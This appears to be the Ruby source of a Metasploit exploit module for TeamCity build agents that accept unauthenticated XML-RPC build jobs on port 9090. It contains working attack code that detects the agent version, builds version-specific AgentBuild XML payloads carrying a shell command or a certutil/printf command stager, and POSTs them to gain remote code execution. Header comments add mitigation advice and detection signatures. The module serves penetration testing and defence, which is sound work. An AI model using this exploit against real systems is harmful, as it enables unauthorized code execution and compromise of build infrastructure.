Path: blob/master/modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb
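##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for TeamCity build agents that accept build jobs over
# unauthenticated XML-RPC (bidirectional agent communication).
#
# Flow, as implemented below:
#   1. determine_version asks the agent for its build number
#      (buildAgent.getVersion).
#   2. build_request picks the AgentBuild XML layout matching that build number.
#   3. send_request POSTs the job (buildAgent.run / buildAgent.runBuild); the
#      job contains a single "simpleRunner" step whose script.content is the
#      supplied command or the command stager.
#
# Defensive notes: the exposure exists only while the agent's XML-RPC listener
# (TCP/9090 per the description below) is reachable by hosts other than the
# TeamCity server. Restricting that port to the server's address, or moving
# agents off bidirectional communication, removes it. For detection, the
# requests of interest are HTTP POSTs to "/" with content type text/xml whose
# methodName is buildAgent.getVersion, buildAgent.run or buildAgent.runBuild
# and whose source is not the TeamCity server.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Registers module metadata, targets and options.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TeamCity Agent XML-RPC Command Execution',
      'Description' => %q(
        This module allows remote code execution on TeamCity Agents configured
        to use bidirectional communication via xml-rpc. In bidirectional mode
        the TeamCity server pushes build commands to the Build Agents over port
        TCP/9090 without requiring authentication. Up until version 10 this was
        the default configuration. This module supports TeamCity agents from
        version 6.0 onwards.
      ),
      'Author' => ['Dylan Pindur <[email protected]>'],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['URL', 'https://www.tenable.com/plugins/nessus/94675']
        ],
      'Platform' => %w[linux win],
      'Targets' =>
        [
          ['Windows', { 'Platform' => 'win' }],
          ['Linux', { 'Platform' => 'linux' }]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2015-04-14'))

    deregister_options('SRVHOST', 'SRVPORT', 'URIPATH', 'VHOST')
    register_options(
      [
        Opt::RPORT(9090),
        OptString.new(
          'CMD',
          [false, 'Execute this command instead of using command stager', '']
        )
      ]
    )
  end

  # Reports whether the agent answers the version query with a supported
  # build number.
  #
  # @return [Exploit::CheckCode] Unknown when no usable version reply was
  #   received, Appears for build numbers >= 15772, Safe otherwise
  def check
    version = determine_version
    # No reply (or an unparseable one) proves nothing about the host, so it
    # must not be reported as Safe.
    return Exploit::CheckCode::Unknown if version.nil?

    version >= 15772 ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end

  # Entry point: runs the CMD option if set, otherwise the platform stager.
  def exploit
    version = determine_version
    # fail_with raises, so nothing below runs without a version.
    fail_with(Failure::NoTarget, 'Could not determine TeamCity Agent version') if version.nil?
    print_status("Found TeamCity Agent running build version #{version}")

    unless datastore['CMD'].blank?
      print_status('Executing user supplied command')
      execute_command(datastore['CMD'], version)
      return
    end

    case target['Platform']
    when 'linux'
      linux_stager(version)
    when 'win'
      windows_stager(version)
    else
      fail_with(Failure::NoTarget, 'Unsupported target platform!')
    end
  end

  # Generates the certutil command stager and submits it as one build script.
  #
  # @param version [Integer] agent build number from determine_version
  def windows_stager(version)
    print_status('Constructing Windows payload')

    stager = generate_cmdstager(
      flavor: :certutil,
      temp: '.',
      concat_operator: "\n",
      nodelete: true
    ).join("\n")
    # Rewrites any line that starts with a five-character .exe name so that it
    # is launched through `start ""`.
    stager = stager.gsub(/^(?<exe>.{5}\.exe)/, 'start "" \k<exe>')

    execute_command(stager, version)
  end

  # Generates the printf command stager and submits it as one build script.
  #
  # @param version [Integer] agent build number from determine_version
  def linux_stager(version)
    print_status('Constructing Linux payload')

    stager = generate_cmdstager(
      flavor: :printf,
      temp: '.',
      concat_operator: "\n",
      nodelete: true
    ).join("\n")
    # Appended so the last stager line is run in the background.
    stager << ' &'

    execute_command(stager, version)
  end

  # Wraps a script in the version-appropriate build request and sends it.
  # Both stagers share this path so the "no compatible build config" handling
  # lives in one place.
  #
  # @param cmd [String] script text placed in the runner's script.content
  # @param version [Integer] agent build number from determine_version
  def execute_command(cmd, version)
    xml_payload = build_request(cmd, version)
    if xml_payload.nil?
      fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
    end

    print_status("Found compatible build config for TeamCity build #{version}")
    send_request(xml_payload)
  end

  # Queries the agent's build number through buildAgent.getVersion.
  #
  # @return [Integer, nil] the build number, or nil when there is no HTTP 200
  #   reply, the reply has XML parse errors, or it does not hold exactly one
  #   value node. Non-numeric text yields 0 (String#to_i).
  def determine_version
    # strip (not strip!) because strip! returns nil when nothing is removed.
    xml_payload = %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.getVersion</methodName>
      <params></params>
      </methodCall>
    ).strip
    res = send_request_cgi(
      {
        'uri' => '/',
        'method' => 'POST',
        'ctype' => 'text/xml',
        'data' => xml_payload
      },
      10
    )
    return nil unless res && res.code == 200

    xml_doc = res.get_xml_document
    return nil unless xml_doc.errors.empty?

    val = xml_doc.xpath('/methodResponse/params/param/value')
    val.length == 1 ? val.text.to_i : nil
  end

  # POSTs a prepared XML-RPC body to "/" and reports the HTTP outcome.
  #
  # @param xml_payload [String] request body from build_request
  def send_request(xml_payload)
    res = send_request_cgi(
      {
        'uri' => '/',
        'method' => 'POST',
        'ctype' => 'text/xml',
        'data' => xml_payload
      },
      10
    )

    if res && res.code == 200
      print_status("Successfully sent build configuration")
    else
      # Reported as an error so a failed submission is not mistaken for progress.
      print_error("Failed to send build configuration")
    end
  end

  # Selects the request layout for an agent build number.
  #
  # @param script_content [String] script text for the build step
  # @param version [Integer] agent build number
  # @return [String, nil] XML-RPC body, or nil for build numbers 0..15771,
  #   for which this module has no layout
  def build_request(script_content, version)
    case version
    when 0..15771
      nil
    when 15772..17794
      req_teamcity_6(script_content)
    when 17795..21240
      req_teamcity_6_5(script_content)
    when 21241..27401
      req_teamcity_7(script_content)
    when 27402..32059
      req_teamcity_8(script_content)
    when 32060..42001
      req_teamcity_9(script_content)
    when 42002..46532
      req_teamcity_10(script_content)
    else
      # Everything outside the ranges above falls through to the newest layout.
      req_teamcity_2017(script_content)
    end
  end

  # buildAgent.runBuild body used for build numbers above 46532.
  # NOTE(review): script_content is interpolated into the CDATA section as-is.
  #
  # @param script_content [String] script text for the build step
  # @return [String] XML-RPC request body
  def req_teamcity_2017(script_content)
    build_code = Rex::Text.rand_text_alpha(8)
    build_id = Rex::Text.rand_text_numeric(8)
    %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.runBuild</methodName>
      <params>
      <param>
      <value>
      <![CDATA[
      <AgentBuild>
      <myBuildId>#{build_id}</myBuildId>
      <myBuildTypeId>x</myBuildTypeId>
      <myBuildTypeExternalId>x</myBuildTypeExternalId>
      <myCheckoutType>ON_AGENT</myCheckoutType>
      <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>
      <myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>
      <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>
      <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
      <myServerParameters class="StringTreeMap">
      <k>system.build.number</k>
      <v>0</v>
      </myServerParameters>
      <myAccessCode/>
      <myArtifactDependencies/>
      <myArtifactPaths/>
      <myArtifactStorageSettings/>
      <myBuildFeatures/>
      <myBuildTypeOptions/>
      <myFullCheckoutReasons/>
      <myParametersSpecs class="StringTreeMap"/>
      <myPersonalVcsChanges/>
      <myUserBuildParameters/>
      <myVcsChanges/>
      <myVcsRootCurrentRevisions class="tree-map"/>
      <myVcsRootEntries/>
      <myVcsRootOldRevisions class="tree-map"/>
      <myBuildRunners>
      <jetbrains.buildServer.agentServer.BuildRunnerData>
      <myId>x</myId>
      <myIsDisabled>false</myIsDisabled>
      <myRunType>simpleRunner</myRunType>
      <myRunnerName>x</myRunnerName>
      <myChildren class="list"/>
      <myServerParameters class="tree-map">
      <entry>
      <string>teamcity.build.step.name</string>
      <string>x</string>
      </entry>
      </myServerParameters>
      <myRunnerParameters class="tree-map">
      <entry>
      <string>script.content</string>
      <string>#{script_content}</string>
      </entry>
      <entry>
      <string>teamcity.step.mode</string>
      <string>default</string>
      </entry>
      <entry>
      <string>use.custom.script</string>
      <string>true</string>
      </entry>
      </myRunnerParameters>
      </jetbrains.buildServer.agentServer.BuildRunnerData>
      </myBuildRunners>
      </AgentBuild>
      ]]>
      </value>
      </param>
      </params>
      </methodCall>
    ).strip
  end

  # buildAgent.runBuild body used for build numbers 42002..46532. Differs from
  # the 2017 layout only by omitting myArtifactStorageSettings.
  #
  # @param script_content [String] script text for the build step
  # @return [String] XML-RPC request body
  def req_teamcity_10(script_content)
    build_code = Rex::Text.rand_text_alpha(8)
    build_id = Rex::Text.rand_text_numeric(8)
    %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.runBuild</methodName>
      <params>
      <param>
      <value>
      <![CDATA[
      <AgentBuild>
      <myBuildId>#{build_id}</myBuildId>
      <myBuildTypeId>x</myBuildTypeId>
      <myBuildTypeExternalId>x</myBuildTypeExternalId>
      <myCheckoutType>ON_AGENT</myCheckoutType>
      <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>
      <myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>
      <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>
      <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
      <myServerParameters class="StringTreeMap">
      <k>system.build.number</k>
      <v>0</v>
      </myServerParameters>
      <myAccessCode/>
      <myArtifactDependencies/>
      <myArtifactPaths/>
      <myBuildFeatures/>
      <myBuildTypeOptions/>
      <myFullCheckoutReasons/>
      <myParametersSpecs class="StringTreeMap"/>
      <myPersonalVcsChanges/>
      <myUserBuildParameters/>
      <myVcsChanges/>
      <myVcsRootCurrentRevisions class="tree-map"/>
      <myVcsRootEntries/>
      <myVcsRootOldRevisions class="tree-map"/>
      <myBuildRunners>
      <jetbrains.buildServer.agentServer.BuildRunnerData>
      <myId>x</myId>
      <myIsDisabled>false</myIsDisabled>
      <myRunType>simpleRunner</myRunType>
      <myRunnerName>x</myRunnerName>
      <myChildren class="list"/>
      <myServerParameters class="tree-map">
      <entry>
      <string>teamcity.build.step.name</string>
      <string>x</string>
      </entry>
      </myServerParameters>
      <myRunnerParameters class="tree-map">
      <entry>
      <string>script.content</string>
      <string>#{script_content}</string>
      </entry>
      <entry>
      <string>teamcity.step.mode</string>
      <string>default</string>
      </entry>
      <entry>
      <string>use.custom.script</string>
      <string>true</string>
      </entry>
      </myRunnerParameters>
      </jetbrains.buildServer.agentServer.BuildRunnerData>
      </myBuildRunners>
      </AgentBuild>
      ]]>
      </value>
      </param>
      </params>
      </methodCall>
    ).strip
  end

  # buildAgent.runBuild body used for build numbers 32060..42001.
  #
  # @param script_content [String] script text for the build step
  # @return [String] XML-RPC request body
  def req_teamcity_9(script_content)
    build_id = Rex::Text.rand_text_numeric(8)
    %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.runBuild</methodName>
      <params>
      <param>
      <value>
      <![CDATA[
      <AgentBuild>
      <myBuildId>#{build_id}</myBuildId>
      <myBuildTypeId>x</myBuildTypeId>
      <myBuildTypeExternalId>x</myBuildTypeExternalId>
      <myCheckoutType>ON_AGENT</myCheckoutType>
      <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
      <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
      <myServerParameters class="StringTreeMap">
      <k>system.build.number</k>
      <v>0</v>
      </myServerParameters>
      <myAccessCode/>
      <myArtifactDependencies/>
      <myArtifactPaths/>
      <myBuildFeatures/>
      <myBuildTypeOptions/>
      <myFullCheckoutReasons/>
      <myPersonalVcsChanges/>
      <myUserBuildParameters/>
      <myVcsChanges/>
      <myVcsRootCurrentRevisions class="tree-map"/>
      <myVcsRootEntries/>
      <myVcsRootOldRevisions class="tree-map"/>
      <myBuildRunners>
      <jetbrains.buildServer.agentServer.BuildRunnerData>
      <myId>x</myId>
      <myIsDisabled>false</myIsDisabled>
      <myRunType>simpleRunner</myRunType>
      <myRunnerName>x</myRunnerName>
      <myChildren class="list"/>
      <myServerParameters class="tree-map">
      <entry>
      <string>teamcity.build.step.name</string>
      <string>x</string>
      </entry>
      </myServerParameters>
      <myRunnerParameters class="tree-map">
      <entry>
      <string>script.content</string>
      <string>#{script_content}</string>
      </entry>
      <entry>
      <string>teamcity.step.mode</string>
      <string>default</string>
      </entry>
      <entry>
      <string>use.custom.script</string>
      <string>true</string>
      </entry>
      </myRunnerParameters>
      </jetbrains.buildServer.agentServer.BuildRunnerData>
      </myBuildRunners>
      </AgentBuild>
      ]]>
      </value>
      </param>
      </params>
      </methodCall>
    ).strip
  end

  # buildAgent.runBuild body used for build numbers 27402..32059.
  #
  # @param script_content [String] script text for the build step
  # @return [String] XML-RPC request body
  def req_teamcity_8(script_content)
    build_id = Rex::Text.rand_text_numeric(8)
    %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.runBuild</methodName>
      <params>
      <param>
      <value>
      <![CDATA[
      <AgentBuild>
      <myBuildId>#{build_id}</myBuildId>
      <myBuildTypeId>x</myBuildTypeId>
      <myCheckoutType>ON_AGENT</myCheckoutType>
      <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
      <myServerParameters class="tree-map">
      <entry>
      <string>system.build.number</string>
      <string>0</string>
      </entry>
      </myServerParameters>
      <myAccessCode/>
      <myArtifactDependencies/>
      <myArtifactPaths/>
      <myBuildTypeOptions/>
      <myFullCheckoutReasons/>
      <myPersonalVcsChanges/>
      <myUserBuildParameters/>
      <myVcsChanges/>
      <myVcsRootCurrentRevisions class="tree-map"/>
      <myVcsRootEntries/>
      <myVcsRootOldRevisions class="tree-map"/>
      <myBuildRunners>
      <jetbrains.buildServer.agentServer.BuildRunnerData>
      <myId>x</myId>
      <myIsDisabled>false</myIsDisabled>
      <myRunType>simpleRunner</myRunType>
      <myRunnerName>x</myRunnerName>
      <myChildren class="list"/>
      <myServerParameters class="tree-map">
      <entry>
      <string>teamcity.build.step.name</string>
      <string>x</string>
      </entry>
      </myServerParameters>
      <myRunnerParameters class="tree-map">
      <entry>
      <string>script.content</string>
      <string>#{script_content}</string>
      </entry>
      <entry>
      <string>teamcity.step.mode</string>
      <string>default</string>
      </entry>
      <entry>
      <string>use.custom.script</string>
      <string>true</string>
      </entry>
      </myRunnerParameters>
      </jetbrains.buildServer.agentServer.BuildRunnerData>
      </myBuildRunners>
      <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
      <myBuildFeatures/>
      </AgentBuild>
      ]]>
      </value>
      </param>
      </params>
      </methodCall>
    ).strip
  end

  # buildAgent.runBuild body used for build numbers 21241..27401.
  #
  # @param script_content [String] script text for the build step
  # @return [String] XML-RPC request body
  def req_teamcity_7(script_content)
    build_id = Rex::Text.rand_text_numeric(8)
    %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.runBuild</methodName>
      <params>
      <param>
      <value>
      <![CDATA[
      <AgentBuild>
      <myBuildId>#{build_id}</myBuildId>
      <myBuildTypeId>x</myBuildTypeId>
      <myCheckoutType>ON_AGENT</myCheckoutType>
      <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
      <myServerParameters class="tree-map">
      <no-comparator/>
      <entry>
      <string>system.build.number</string>
      <string>0</string>
      </entry>
      </myServerParameters>
      <myVcsRootOldRevisions class="tree-map">
      <no-comparator/>
      </myVcsRootOldRevisions>
      <myVcsRootCurrentRevisions class="tree-map">
      <no-comparator/>
      </myVcsRootCurrentRevisions>
      <myAccessCode/>
      <myArtifactDependencies/>
      <myArtifactPaths/>
      <myBuildTypeOptions/>
      <myFullCheckoutReasons/>
      <myPersonalVcsChanges/>
      <myUserBuildParameters/>
      <myVcsChanges/>
      <myVcsRootEntries/>
      <myBuildRunners>
      <jetbrains.buildServer.agentServer.BuildRunnerData>
      <myRunType>simpleRunner</myRunType>
      <myRunnerName>x</myRunnerName>
      <myRunnerParameters class="tree-map">
      <no-comparator/>
      <entry>
      <string>script.content</string>
      <string>#{script_content}</string>
      </entry>
      <entry>
      <string>teamcity.step.mode</string>
      <string>default</string>
      </entry>
      <entry>
      <string>use.custom.script</string>
      <string>true</string>
      </entry>
      </myRunnerParameters>
      <myServerParameters class="tree-map">
      <no-comparator/>
      <entry>
      <string>teamcity.build.step.name</string>
      <string>x</string>
      </entry>
      </myServerParameters>
      </jetbrains.buildServer.agentServer.BuildRunnerData>
      </myBuildRunners>
      <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
      <myBuildFeatures/>
      </AgentBuild>
      ]]>
      </value>
      </param>
      </params>
      </methodCall>
    ).strip
  end

  # buildAgent.run body used for build numbers 17795..21240.
  #
  # @param script_content [String] script text for the build step
  # @return [String] XML-RPC request body
  def req_teamcity_6_5(script_content)
    build_id = Rex::Text.rand_text_numeric(8)
    %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.run</methodName>
      <params>
      <param>
      <value>
      <![CDATA[
      <AgentBuild>
      <myBuildId>#{build_id}</myBuildId>
      <myBuildTypeId>x</myBuildTypeId>
      <myPersonal>false</myPersonal>
      <myCheckoutType>ON_AGENT</myCheckoutType>
      <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
      <myServerParameters class="tree-map">
      <no-comparator/>
      <entry>
      <string>system.build.number</string>
      <string>0</string>
      </entry>
      </myServerParameters>
      <myVcsRootOldRevisions class="tree-map">
      <no-comparator/>
      </myVcsRootOldRevisions>
      <myVcsRootCurrentRevisions class="tree-map">
      <no-comparator/>
      </myVcsRootCurrentRevisions>
      <myAccessCode/>
      <myArtifactDependencies/>
      <myBuildTypeOptions/>
      <myPersonalVcsChanges/>
      <myUserBuildParameters/>
      <myVcsChanges/>
      <myVcsRootEntries/>
      <myBuildRunners>
      <jetbrains.buildServer.agentServer.BuildRunnerData>
      <myRunType>simpleRunner</myRunType>
      <myRunnerName>x</myRunnerName>
      <myRunnerParameters class="tree-map">
      <no-comparator/>
      <entry>
      <string>script.content</string>
      <string>#{script_content}</string>
      </entry>
      <entry>
      <string>use.custom.script</string>
      <string>true</string>
      </entry>
      </myRunnerParameters>
      <myServerParameters class="tree-map">
      <no-comparator/>
      </myServerParameters>
      </jetbrains.buildServer.agentServer.BuildRunnerData>
      </myBuildRunners>
      </AgentBuild>
      ]]>
      </value>
      </param>
      </params>
      </methodCall>
    ).strip
  end

  # buildAgent.run body used for build numbers 15772..17794.
  #
  # @param script_content [String] script text for the build step
  # @return [String] XML-RPC request body
  def req_teamcity_6(script_content)
    build_id = Rex::Text.rand_text_numeric(8)
    %(
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
      <methodName>buildAgent.run</methodName>
      <params>
      <param>
      <value>
      <![CDATA[
      <AgentBuild>
      <myBuildId>#{build_id}</myBuildId>
      <myBuildTypeId>x</myBuildTypeId>
      <myAccessCode></myAccessCode>
      <myPersonal>false</myPersonal>
      <myCheckoutType>ON_AGENT</myCheckoutType>
      <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
      <myServerParameters class="tree-map">
      <no-comparator/>
      <entry>
      <string>system.build.number</string>
      <string>0</string>
      </entry>
      </myServerParameters>
      <myVcsRootOldRevisions class="tree-map">
      <no-comparator/>
      </myVcsRootOldRevisions>
      <myVcsRootCurrentRevisions class="tree-map">
      <no-comparator/>
      </myVcsRootCurrentRevisions>
      <myArtifactDependencies/>
      <myBuildTypeOptions/>
      <myPersonalVcsChanges/>
      <myUserBuildParameters/>
      <myVcsChanges/>
      <myVcsRootEntries/>
      <myBuildRunners>
      <jetbrains.buildServer.agentServer.BuildRunnerData>
      <myRunType>simpleRunner</myRunType>
      <myServerParameters class="tree-map">
      <no-comparator/>
      </myServerParameters>
      <myRunnerParameters class="tree-map">
      <no-comparator/>
      <entry>
      <string>script.content</string>
      <string>#{script_content}</string>
      </entry>
      <entry>
      <string>use.custom.script</string>
      <string>true</string>
      </entry>
      </myRunnerParameters>
      </jetbrains.buildServer.agentServer.BuildRunnerData>
      </myBuildRunners>
      </AgentBuild>
      ]]>
      </value>
      </param>
      </params>
      </methodCall>
    ).strip
  end
end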